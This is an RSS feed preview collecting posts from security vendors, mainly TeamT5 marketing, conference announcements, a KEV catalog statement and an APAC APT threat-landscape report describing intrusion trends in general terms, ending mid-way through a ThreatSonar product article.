Pipes Feed Preview: SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CC Blog (Japanese edition) & nao_sec & ESET Ireland

  1. Symantec CBX Through the Paparazzi Lens

    Fri, 03 Apr 2026 13:00:00 -0000

    A recap of the media moments that surprised us and that everyone is still talking about
  2. The U.S. Navy’s Playbook for Cost-Controlled, Reliable Cybersecurity

    Wed, 01 Apr 2026 10:00:00 -0000

    A case study in how Carahsoft and Broadcom deliver efficiency and savings
  3. The Modern Threat Landscape and The Partner’s New Burden

    Tue, 31 Mar 2026 14:20:00 -0000

    Part 1 of 6: Resale is fading. Resilience is rising.
  4. Symantec CBX Rocked RSAC 2026 Conference

    Fri, 27 Mar 2026 17:00:00 -0000

    CBX debuted to great acclaim at one of cybersecurity’s greatest conferences
  5. For Financial Services, a Wake-Up Call for Reclaiming IAM Control

    Fri, 27 Mar 2026 10:00:00 -0000

    Part 5: How to achieve resilience, auditability, and AI-scale identity—without betting the bank on someone else’s control plane
  6. The Next Identity Shift

    Thu, 26 Mar 2026 13:00:00 -0000

    Runtime governance for securing the agentic enterprise
  7. Cyber Legends: Behind the Scenes of CBX

    Wed, 25 Mar 2026 12:00:00 -0000

    An exclusive Cyber Legends interview with Arjun Narang, one of the experts behind the unified security platform everyone’s buzzing about
  8. Built for This Moment (and All Those to Come)

    Mon, 23 Mar 2026 11:30:00 -0000

    Introducing Symantec CBX: Finally, a security platform for smaller teams fighting larger threats
  9. Libyan Oil Refinery Among Targets in Long-running Likely Espionage Campaign

    Fri, 20 Mar 2026 10:00:00 -0000

    The modular backdoor AsyncRAT was deployed on targeted networks.
  10. How Cloud-Managed DLP Lowers the Barrier to Entry

    Thu, 19 Mar 2026 11:00:00 -0000

    Quick deployment, meaningful visibility and a foundation for long-term data security
  11. TeamT5: From an APAC Threat Intelligence Pioneer to a Global Leader

    Tue, 31 Mar 2026 16:00:00 -0000

    <p>For nearly two decades, TeamT5 has been deeply rooted in the Asia-Pacific region—researching threat actors, tracking attack campaigns, and uncovering overlooked risks and signals.</p> <p>Today, we officially unveil TeamT5’s new brand identity. This transformation is more than a visual update; it is a definitive signal of our identity, our values, and our global trajectory.</p> <h2>A Threat Intelligence Pioneer Rooted in Asia-Pacific</h2> <p>TeamT5 is a threat intelligence pioneer born in Asia.</p> <p>Based in Taiwan, we leverage a unique geopolitical perspective and deep linguistic expertise to track Advanced Persistent Threats (APTs) and ransomware activity across the region.</p> <p>We provide more than just data to government agencies, financial institutions, and technology leaders; we deliver actionable insights grounded in regional context—intelligence that organizations can immediately deploy in high-stakes environments.</p> <p>This rebranding does not change our direction. Instead, it is the purest expression of the mission we have upheld from the start: transforming complex threats into decisive action.</p> <h2>The Evolution: From Technical Roots to Global Trusted Partner</h2> <p>TeamT5’s mission has always been clear, though never simple: <strong>Transform complex threats into actionable intelligence that enables organizations to move from reactive defense to smarter detection and response.</strong></p> <p>As threats evolve faster and become harder to track and interpret, the value of intelligence cannot stop at simply telling organizations what has happened.</p> <p>This moment marks a pivotal step forward:</p> <ul> <li><strong>A Mature Identity</strong>: We have evolved from a technical startup into a professional, trusted enterprise brand.</li> <li><strong>Global Unity</strong>: We are establishing a unified presence as we expand our long-term footprint in international markets.</li> <li><strong>Operational Focus</strong>: Our new visual identity reflects how we operate—remaining alert as threats evolve, acting swiftly in critical moments, and staying sharply focused on what truly matters.</li> </ul> <p><strong>The concept of our new logo, The Spotlight: Sharpen the Sight. It symbolizes our role in the ecosystem.</strong></p> <p>We are not defenders standing passively under the spotlight. Instead, we are intelligence hunters who precisely locate threats in the shadows, operating at the boundary between the visible and the unseen. Our goal is not to illuminate everything. Rather, we focus on the signals that truly matter—so our customers can see more clearly, assess risks confidently, and act decisively.</p> <p><img src="https://uploads.teamt5.org/upload/original/teamt5-from-an-apac-threat-intelligence-pioneer-to-a-global-leader_en_pic.png" alt=""></p> <h2>Our Core Values: Threat Intelligence that Powers Proactive Defense</h2> <p>We believe the value of threat intelligence lies not in the volume of information, but in whether it enables organizations to identify critical signals earlier.</p> <p>TeamT5’s vision is to become <strong>the most trusted threat intelligence partner in the Asia-Pacific region</strong>, helping organizations move from <strong>responding to attacks</strong> toward <strong>anticipating threats</strong>.</p> <p>Behind this vision are the four core values that have long guided TeamT5. These values are not just principles—they shape how we conduct research, build products, and collaborate with partners.</p> <h3>Continuous Exploration</h3> <p>We never stop exploring. Beyond monitoring known threats, we actively venture into the unknown—uncovering overlooked signals in complex threat landscapes and revealing emerging attack patterns and techniques.</p> <h3>Precise Insight</h3> <p>Precision is the foundation of proactive defense. We do more than track indicators—we analyze the logic behind threats so that intelligence can truly support critical decision-making.</p> <h3>Agile Action</h3> <p>Speed is essential when facing cyber threats. We track every step of the attacker, enabling action before threats escalate and transforming intelligence into real-time protection.</p> <h3>Trusted Collaboration</h3> <p>Threat intelligence becomes stronger when shared. Through open knowledge exchange and two-way communication, we build long-term partnerships with customers and collaborators based on trust—standing together against evolving threats.</p> <h2>Continuing the Journey of Exploration</h2> <p>TeamT5 is both an explorer and an innovator in threat intelligence.</p> <p>We lead the discovery of emerging threats, deconstruct adversary behavior, and build defensive capabilities that evolve as quickly as our adversaries.</p> <p>This rebranding represents our continued commitment to <strong>exploration, insight, action, and collaboration</strong>. It also reaffirms our belief: <strong>When intelligence is done right, organizations gain the advantage in cyber defense.</strong></p> <p>TeamT5’s founding mission remains unchanged: <strong>more precise intelligence, earlier action.</strong></p> <p>We are ready. The next chapter starts now.</p>
  12. Decoding Modern Cyber Threats: From Intelligence to Action in APAC [Podcast Series]

    Mon, 30 Mar 2026 16:00:00 -0000

    <p>What if the warning signs of the next cyberattack are already visible—hidden in policy shifts, dark web chatter, and evolving APT campaigns across APAC? This podcast series uncovers how modern threat intelligence works in practice: from turning raw data into decisions, to understanding cybercrime-as-a-service, fixing patch prioritization failures, and combining IoCs with proactive threat hunting.</p> <p>Tune in to uncover the signals behind today’s cyber threats—and learn how to stay one step ahead.</p> <h2>How Threat Intelligence Becomes Decision-Ready</h2> <p>This briefing explains how raw threat data is transformed into structured intelligence that supports strategic and operational decisions.</p> <ul> <li>Listen Now: <a href="https://youtu.be/yTds7lvtEzc">https://youtu.be/yTds7lvtEzc</a></li> </ul> <h2>How APAC APT Campaigns Are Evolving</h2> <p>This briefing analyzes how advanced persistent threat campaigns in APAC evolve across stages, targeting strategies, and persistence models.</p> <ul> <li>Listen Now: <a href="https://youtu.be/5gkgpheTahM">https://youtu.be/5gkgpheTahM</a></li> </ul> <h2>Inside Today’s Cybercrime-as-a-Service Ecosystem</h2> <p>This briefing examines how cybercrime groups operate as structured service ecosystems, lowering barriers to entry for attackers.</p> <ul> <li>Listen Now: <a href="https://youtu.be/BMm1reTszQE">https://youtu.be/BMm1reTszQE</a></li> </ul> <h2>How APAC Cyber Policy Signals Emerging Threats</h2> <p>This briefing discusses how geopolitical and cyber policy developments in APAC shape threat actor behavior and targeting trends.</p> <ul> <li>Listen Now: <a href="https://youtu.be/w2CuYp0mLG8">https://youtu.be/w2CuYp0mLG8</a></li> </ul> <h2>What the Deep &amp; Dark Web Reveals Before Attacks</h2> <p>This briefing analyzes how underground forums and hidden marketplaces signal emerging threats before incidents surface publicly.</p> <ul> <li>Listen Now: <a href="https://youtu.be/KeZbhkTyl4M">https://youtu.be/KeZbhkTyl4M</a></li> </ul> <h2>Why Patch Prioritization Keeps Failing</h2> <p>This briefing examines why vulnerability overload leads to ineffective patching and how intelligence-driven prioritization improves outcomes.</p> <ul> <li>Listen Now: <a href="https://youtu.be/ow_GhYNZL8E">https://youtu.be/ow_GhYNZL8E</a></li> </ul> <h2>How IoCs and Threat Hunting Work Together</h2> <p>This briefing explores how indicators of compromise and proactive threat hunting complement each other in detecting adversary activity.</p> <ul> <li>Listen Now: <a href="https://youtu.be/9jvQkd6gxfc">https://youtu.be/9jvQkd6gxfc</a></li> </ul> <p><strong>Subscribe to TeamT5 on YouTube for the latest threat trends and defense strategies:</strong><br/> <a href="https://www.youtube.com/@teamt5/featured">TeamT5 YouTube Channel</a></p>
  13. TeamT5 at CyberSecMY Conference 2026 (CSMY2026)

    Mon, 09 Mar 2026 16:00:00 -0000

    <p>TeamT5 is proud to announce our participation in <a href="https://cybersecasia.org/csmy2026">CyberSecMY Conference 2026 (CSMY2026)</a>, one of Malaysia’s premier cybersecurity events, bringing together cybersecurity leaders, practitioners, and decision-makers across industries.</p> <p>CSMY2026 serves as a vital platform for addressing today’s most pressing cybersecurity challenges and sharing best practices in an increasingly complex threat landscape. With 40+ distinguished speakers and panelists, the conference delivers deep insights into the latest cyber threats, trends, and defensive strategies shaping the future of security.</p> <p>The event is expected to welcome 400+ senior security professionals from sectors including financial services, retail, IT, healthcare, public sector, enterprises, and consumer businesses.</p> <p>At CSMY2026, TeamT5 will demonstrate how our advanced threat intelligence and APT research empower organizations to proactively detect, understand, and mitigate sophisticated cyber threats. Our team looks forward to engaging with industry peers, exchanging insights, and supporting Malaysia’s cybersecurity resilience.</p> <p>Visit TeamT5 at the exhibition area and connect with our experts to learn how actionable threat intelligence can strengthen your security posture.</p> <h2 id="teamt5-at-cybersecmy-conference-2026">TeamT5 at CyberSecMY Conference 2026</h2> <ul> <li><strong>Date</strong>: May 19-20, 2026</li> <li><strong>City</strong>: Kuala Lumpur, Malaysia</li> <li>We&#39;ll have a booth at the venue. You are welcome to talk with us there.</li> </ul> <h3>Speech: The Evolving Cybersecurity Landscape in APAC: Real-World Threat Cases from Malaysia</h3> <ul> <li><p><strong>Time</strong>: 2:25 PM on May 20 (subject to change at the organizer&#39;s discretion)</p> </li> <li><p><strong>Speaker</strong>: John Lu (Assistant Vice President, Global Engagement, TeamT5)</p> </li> <li><p><strong>About Speaker</strong>: John is the AVP of Global Sales at TeamT5 and a cybersecurity veteran with over 15 years of experience. Before transitioning into his global sales role, he spent seven years leading the technical support team at TeamT5, working closely with organizations to develop practical threat hunting strategies and translate complex threat intelligence into actionable security insights.</p> </li> <li><p><strong>About Speech</strong>:</p> <ul> <li>Geopolitical drivers of state-sponsored espionage and its impact on regional stability.</li> <li>The APT landscape: identifying major regional APT actors, TTPs, motivations, and target industries.</li> <li>Malaysia-specific case studies.</li> <li>Turning threat intelligence into proactive threat hunting strategies.</li> </ul> </li> </ul>
  14. Reaching the Peak of Defense with ThreatVision Intelligence

    Sun, 01 Mar 2026 16:00:00 -0000

    <p>Defending against cyber threats today is like navigating complex terrain. Organizations must understand the broader landscape, adjust as conditions change, and move carefully through high-risk areas. Without a comprehensive view of threats, teams are easily overwhelmed by alerts and miss what truly matters. Effective defense requires different perspectives. Executives focus on long-term risk, operations leaders need attack context, and frontline teams rely on precise technical indicators. ThreatVision connects these needs through a structured intelligence framework, turning fragmented data into usable threat intelligence that supports decisions from strategy to response.</p> <h2>ThreatVision’s Three Intelligence Perspectives: Building an Effective Defense Framework</h2> <p>ThreatVision organizes years of threat research into three intelligence layers—<strong>Strategic, Operational, and Tactical</strong>—each designed to support specific roles and defense objectives.</p> <h3>1. Strategic: Understanding Threat Trends, Geopolitical Impact, and Industry Risk</h3> <p>Strategic intelligence is designed for CISOs and executives who need a macro-level view of risk. It focuses on identifying trends in threat actors and targeting behavior, while incorporating geopolitical dynamics and policy environments to assess systemic risk across industries. This intelligence supports mid- to long-term security planning and informed resource allocation.</p> <ul> <li><strong>APT Group Research</strong>: Analysis of active APAC threat groups, focusing on evolving tactics, targets, and operational scope.</li> <li><strong>Asia-Pacific Cyber Policy</strong>: Assessment of geopolitical developments—particularly China—alongside cybersecurity policy and regulatory trends from the Chinese-speaking world.</li> <li><strong>Threat Landscape Overview</strong>: Analysis of long-term threat trends across national, regional, and industry levels.</li> </ul> <h3>2. Operational: Analyzing Adversaries, Criminal Ecosystems, and Attack Chains</h3> <p>Operational intelligence supports SOC and investigation teams by clarifying attack context and linking fragmented alerts into coherent incidents. It enables analysts to understand adversary identity, methods, and intent, providing shared context for coordinated investigation and response.</p> <ul> <li><strong>APT Threat Analysis</strong>: Correlation of APAC APT activity with geopolitical context, including incident background, IoCs, adversary profiles, targets, and TTPs.</li> <li><strong>Cybercrime Intelligence</strong>: Tracking of underground forums and Crime-as-a-Service (CaaS) ecosystems, including deep and dark web activity and Chinese-language encrypted communities.</li> <li><strong>Malware</strong>: Correlation of malware samples and behaviors to assess attacker intent and malware evolution.</li> </ul> <h3>3. Tactical: Enabling Frontline Defense with Actionable Tools and Vulnerability Focus</h3> <p>Tactical intelligence is designed for frontline security and infrastructure teams. It delivers technical indicators and tools that can be directly applied to firewalls, Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM) systems, enabling rapid detection and immediate threat blocking.</p> <ul> <li><strong>Vulnerability Solutions</strong>: Insight into real-world exploitation patterns and patch prioritization.</li> <li><strong>Deep &amp; Dark Web Risk Monitoring</strong>: Early warning from deep and dark web forums, marketplaces, and Chinese-language underground communities.</li> <li><strong>Indicators of Compromise (IoCs)</strong>: IoCs associated with nation-state APT activity and large-scale cybercrime.</li> <li><strong>Threat Hunting Tools</strong>: Intelligence-driven detection rules for proactive threat hunting.</li> </ul> <p><img src="https://uploads.teamt5.org/upload/original/reaching-the-peak-of-defense-with-threatvision-intelligence_form_EN.png" alt=""></p> <h2>Crossing the Ridge with ThreatVision</h2> <p>Threats do not slow down, but organizations can control how they respond. By shifting between Strategic, Operational, and Tactical intelligence, ThreatVision helps teams maintain direction, clarify context, and enforce protection. The result is a stable, resilient defense framework—even as the threat landscape continues to change.</p> <p><img src="https://uploads.teamt5.org/upload/original/reaching-the-peak-of-defense-with-threatvision-intelligence_gif%20update_EN.gif" alt=""></p>
  15. TeamT5 Statement Regarding CISA’s KEV Catalog Updates

    Sun, 22 Feb 2026 16:00:00 -0000

    <p>TeamT5 acknowledges the recent updates by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its <a href="https://www.cisa.gov/news-events/alerts/2026/02/17/cisa-adds-four-known-exploited-vulnerabilities-catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>, which highlights vulnerabilities that have been seen exploited in the wild by malicious actors and underscores the importance of effective remediation and ongoing vigilance within the cybersecurity ecosystem.</p> <p>We would like to clarify our position and provide accurate context regarding the historical vulnerability referenced in the KEV Catalog and related reporting:</p> <p><strong>1. Historical Vulnerability Identified and Fully Remediated</strong></p> <p>The vulnerability referenced in the KEV Catalog and in related media reports pertains to an issue identified in 2024 within our ThreatSonar Anti-Ransomware product. </p> <ul> <li>The vulnerability was proactively discovered by TeamT5’s Product Security Incident Response Team (PSIRT) during internal security reviews.</li> <li>Upon discovery, TeamT5 immediately developed and released a patch, and we <strong>proactively assisted all affected customers with updating to the remediated version.</strong></li> <li>All impacted customers have since migrated off the vulnerable versions; <strong>no customer systems remain in service with the affected release.</strong></li> </ul> <p>A public advisory was issued by TeamT5 in July 2024 with <a href="https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/">full details about the vulnerability and patch guidance</a>.</p> <p><strong>2. 
Strengthening Security Posture and Resilience</strong></p> <p>In direct response to this and similar industry risk signals such as those highlighted in recent CISA KEV updates, TeamT5 has invested significantly in strengthening our security practices:</p> <ul> <li>Enhancing our secure software development lifecycle and product security controls.</li> <li>Formalizing and standardizing internal incident response and vulnerability management processes.</li> <li>Engaging independent third-party security teams for red team exercises and external validation of our security defenses.</li> </ul> <p>These investments reaffirm our commitment to industry best practices and customer protection.</p> <p><strong>3. Ongoing Monitoring and Threat Detection</strong></p> <p>TeamT5 maintains continuous monitoring of threats and exploitation activity impacting our products and the broader cybersecurity landscape. Our security and threat intelligence teams remain alert to emerging risks and stand ready to respond quickly with mitigations and customer support when needed.</p> <p><strong>4. Commitment to Community and Transparency</strong></p> <p>We support initiatives like the CISA KEV Catalog as an important resource for helping organizations prioritize remediation of vulnerabilities exploited in the wild. TeamT5 continues to collaborate with the cybersecurity community, share information responsibly, and ensure our customers are informed and protected.</p>
  16. We’re Exhibiting at RSA Conference 2026

    Sun, 08 Feb 2026 16:00:00 -0000

    <p>We are pleased to announce that we will be exhibiting at <strong>RSA Conference 2026</strong>, one of the world’s leading cybersecurity events, taking place in San Francisco. This year, we will join the <strong>Taiwan Pavilion</strong> and present our approach to <strong>threat intelligence built from Asia-born insights with global relevance</strong>.</p> <ul> <li><strong>Event</strong>: RSA Conference 2026</li> <li><strong>Expo date</strong>: March 24-26, 2026</li> <li><strong>Booth</strong>: S-1561</li> <li><strong>Location</strong>: Moscone Center, San Francisco, USA</li> </ul> <h2>Threat Intelligence Pioneer, Born in Asia</h2> <p>Cyber threats do not emerge evenly across regions. Many large-scale campaigns and advanced persistent threats (APTs) are first observed in Asia before expanding globally.</p> <p>As a threat intelligence team born and rooted in Asia, we focus on delivering early visibility into adversary behavior, regional geopolitical context, and long-term campaign evolution—helping organizations understand not only what is happening, but why it is happening.</p> <p>At RSA Conference 2026, we will showcase how Asia-Pacific–centric intelligence can complement global security strategies and close critical visibility gaps.</p> <h2>Our Threat Intelligence Approach</h2> <p>Our intelligence framework is designed to support security decision-making across strategic, tactical, and operational layers:</p> <h3>Strategic: Geopolitical Insight &amp; Adversary Profiling</h3> <p>We analyze geopolitical drivers and long-term adversary behavior to help organizations anticipate emerging threats, understand attacker motivations, and assess risk beyond isolated incidents.</p> <h3>Tactical: Intelligence-Driven Threat Hunting</h3> <p>Our intelligence translates real-world adversary TTPs and active campaign insights into actionable threat hunting, enabling security teams to focus on relevant actors rather than generic indicators.</p> <h3>Operational: Threat Response</h3> <p>We help organizations operationalize threat intelligence and ensure intelligence is embedded directly into detection and response workflows.</p> <p>Together, these layers turn threat intelligence from static information into practical, actionable defense. For more about our threat intelligence reports and platform &quot;ThreatVision&quot;, please check <a href="https://teamt5.org/en/products/threatvision/?utm_source=blog&amp;utm_medium=website">here</a>.</p> <h2>Meet Us at RSA Conference 2026</h2> <p>Throughout the three-day event, our team will be available at Booth S-1561 to discuss:</p> <ul> <li>Asia-Pacific threat actors and campaigns</li> <li>Intelligence-driven threat hunting strategies</li> <li>Operationalizing threat intelligence at scale</li> <li>How regional intelligence enhances global defense</li> </ul> <p>Whether you are building a CTI program, refining threat hunting workflows, or looking to strengthen operational response, we welcome the opportunity to connect.</p> <p><strong>Threat Intelligence Pioneer, Born in Asia</strong><br/> 📍 Visit us at RSA Conference 2026 – Booth S-1561 (Taiwan Pavilion)</p> <p><img src="https://uploads.teamt5.org/upload/original/teamt5-rsa-conference-2026_pic.png" alt=""></p>
  17. APT Threat Landscape in APAC 2025: Industrialization of Intrusions

    Sun, 08 Feb 2026 16:00:00 -0000

    <p>With geopolitical tensions continuing to escalate across the APAC region, APT activity in the region is intensifying in both volume and sophistication. <strong>In 2025, TeamT5 tracked more than 510 APT operations affecting 67 countries globally, up steadily from 2024. Of these, 173 attacks targeted Taiwan, far exceeding activity levels seen in other regional targets.</strong></p> <p>Over the years, we have observed that Taiwan remains the most consistently and heavily targeted environment for cyber operations, with China responsible for the majority of observed activity. Taiwan’s role in geopolitical tensions and its value in the global technology supply chain make it uniquely vulnerable to adversaries who seek intelligence or long-term access to achieve political and military objectives. The scale, diversity, and persistence of these campaigns position Taiwan not only as a frontline target, but also as an early-warning bellwether for the direction of China-nexus intrusion tradecraft. Campaigns observed in Taiwan frequently showcase early adoption of new tooling and evolving TTPs; therefore, <strong>Taiwan is more than just a target—it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.</strong></p> <h2 id="key-trends-targeting-of-edge-devices-abuse-of-trusted-services-and-disposable-malware">Key Trends: Targeting of Edge Devices, Abuse of Trusted Services, and Disposable Malware</h2> <p>As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: <strong>we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances</strong>. Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families.
These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign.</p> <p><strong>Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as the “Fail-of-Trust Model”</strong>. In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to China-nexus SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode the foundational assumptions of the digital ecosystem: that “trusted” suppliers are secure.
By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale.</p> <p><strong>Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware.</strong> Much of it consisted of lightweight loaders and downloaders which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder. </p> <h2 id="from-apt-groups-to-a-china-nexus-whole-of-nation-apt-ecosystem">From APT Groups to a China-nexus “Whole-of-Nation” APT Ecosystem</h2> <p>The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, <strong>China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model</strong>: In this model, the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. 
Public attributions and industry reporting over the last few years increasingly describe a threat landscape where the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak has shown how a private Chinese company conducted intrusions and monetized access and how such kind of contractor capacity can be integrated into state-aligned operations.</p> <p>In 2025, more evidence surfaced—via indictments, sanctions packages, and leaked materials—that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. <strong>That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model.</strong> Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain: At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling; Midstream are developers producing exploits, modular malware components, and tailored one-time payloads, optimized for specific environments; At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks. 
This division of labor enables faster iteration, higher operational tempo, and greater resiliency.</p> <h2 id="looking-forward">Looking Forward</h2> <p>For governments, enterprises, and critical sectors worldwide, <strong>the lesson is clear: indicator-driven defense can’t keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed.</strong> Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration.</p> <p>But hunting alone is not enough, because this is an ecosystem problem. <strong>Effective defense also requires deep regional intelligence that explains how the ecosystem is organized.</strong> That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage.</p> <p>TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. <strong>TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work.</strong></p> <h2 id="about-teamt5">About TeamT5</h2> <p>TeamT5 is an APAC-focused threat intelligence expert. Leveraging Taiwan’s unique geopolitical vantage point, multilingual capabilities, and over two decades of research experience, we specialize in APT and ransomware threats across the Asia-Pacific region. We deliver highly localized, action-oriented threat intelligence and defense solutions for government, financial, and technology sectors.</p> <p>We believe that effective cybersecurity begins with continuous tracking and deep understanding of threats. With research at our core, TeamT5 transforms complex and rapidly evolving attack behaviors into actionable intelligence, enabling organizations to anticipate risks and shift from reactive response to proactive defense—reducing cyber risk.</p> <p>As a practitioner of intelligence-driven cyber defense, TeamT5 continuously monitors emerging threats, precisely analyzes attack patterns, and acts with agility to minimize risk exposure. We also value trust and collaboration, actively sharing research insights at world-class cybersecurity conferences and international forums. By working closely with the global security community, as well as our customers and partners, we help advance the practical application of threat intelligence and strengthen cyber resilience.</p> <blockquote> <p>More insights: <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=website&amp;utm_medium=website">[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide</a></p> </blockquote>
  18. Intelligence-driven cybersecurity check: How to accelerate the anti-hacking cycle of "detection → identification → response"?

    Sun, 01 Feb 2026 16:00:00 -0000

    <p>In the wave of digital transformation, cybersecurity threats are ever-present. Imagine: attackers are silently infiltrating your network, using legitimate tools to bypass endpoint detection and response (EDR) platforms and implant hidden backdoors. According to <a href="https://bisi.org.uk/reports/apts-global-review-2022-2025-trends-regions-forecast">BISI</a>'s global <a href="https://teamt5.org/en/posts/what-is-advanced-persistent-threat-apt/">advanced persistent threat (APT)</a> trends survey, the frequency and complexity of APT attacks have been increasing since 2022, with more than half of APT attacks concentrated in the Asia-Pacific region and affecting <a href="https://teamt5.org/en/posts/2025-h1-apt-threat-landscape-insights-asia-pacific-emerges-as-cyberattack-hotspot-experts-highlight-critical-defense-priorities/?utm_source=blog&amp;utm_medium=website">the IT industry, government agencies, and infrastructure</a>. Known attacks are just the tip of the iceberg; many more remain undetected beneath the surface, and the absence of a detection does not mean that an enterprise or organization has not been compromised.</p> <p>Let's explore together how to shorten the defense cycle and, with limited resources, allocate them effectively across "speed × depth × coverage".</p> <h2>The stealthy attacker: the defender's "blind spot"</h2> <p>Today's cybersecurity attacks have entered the era of "disguise." APT groups exploit built-in Windows tools, system services, and even legitimate third-party applications to bypass detection by security solutions.</p> <p><strong>Common APT camouflage techniques include:</strong></p> <ul> <li><strong>Disguising as Legitimate Activity</strong>: Masquerading as legitimate tools or OS-native functions to evade EDR/AV detection</li> <li><strong>Neutralizing Monitoring Points</strong>: Disabling Windows monitoring and scanning functions to evade EDR detection</li> <li><strong>Minimizing Artifacts</strong>: Hidden backdoors that activate only under specific connection sequences and are otherwise not detected</li> </ul> <p>Meanwhile, enterprise IT infrastructure is becoming increasingly decentralized. The intermingling of cloud services, outsourcing vendors, subsidiaries, and remote work environments creates a significant visibility gap for defenders. Any unmonitored or unreported endpoint device may harbor a threat, further blurring the defender's vision.</p> <blockquote> <p>For more attack methods that bypass EDR defenses, and the corresponding prevention strategies, see: <a href="https://teamt5.org/en/posts/how-cybercriminals-bypass-edr-and-what-your-company-should-do-1/?utm_source=blog&amp;utm_medium=website">How Cybercriminals Bypass EDR — And What Your Company Should Do</a></p> </blockquote> <h2>The triangular dilemma of limited resources: speed, depth, and coverage</h2> <p>Frontline cybersecurity personnel typically face limited resources and often have to trade off speed, depth, and coverage, three factors that are difficult to achieve simultaneously in practice.</p> <p>ThreatSonar's core philosophy is to rapidly narrow down the scope of unknown threats using a <strong>"first screening → focused in-depth → precise handling"</strong> model, reducing the investigation from "thousands of devices" to "a few critical devices" within limited resources. Its defense strategy is analogous to "conducting a comprehensive health check first, followed by further diagnosis."</p> <h2>ThreatSonar's dual-axis defense strategy: "Emergency Situation" and "Routine Operations"</h2> <p>ThreatSonar's two key application scenarios together form a complete defense strategy:</p> <p><strong>1. During emergencies: Rapid screening</strong><br/> When a suspected intrusion or anomaly occurs, response time is crucial.</p> <ul> <li><strong>Rapid Locator</strong>: ThreatSonar can complete an endpoint scan in approximately one hour, identifying the critical suspicious devices among thousands.</li> <li><strong>Deep Forensics</strong>: Deep forensic analysis is performed on the identified compromised devices.</li> </ul> <p>This mechanism not only significantly shortens the investigation cycle but also avoids a large amount of time wasted on false positives and redundant analysis.</p> <p><strong>2. During Routine Operations: Regular Compromise Assessment (CA)</strong><br/> During normal operation, ThreatSonar monitors operational status and verifies the environment through regular scans.</p> <ul> <li><strong>Establishing a Baseline</strong>: First establish a normal baseline for the environment.</li> <li><strong>Periodic Scans</strong>: Monthly or quarterly scans are compared against the baseline to surface newly emerging anomalies, such as unknown programs and connections, persistence mechanisms (e.g., automatic startup, WMI events), DNS records, and execution history.</li> </ul> <p>Regular scanning allows businesses to detect potentially suspicious activity early, preventing threats from escalating.</p> <blockquote> <p><a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&amp;utm_medium=website">More about ThreatSonar features</a></p> </blockquote> <h2>ThreatSonar's Four Core Advantages</h2> <p>ThreatSonar is not just a scanning tool but a threat identification and analysis platform that integrates threat 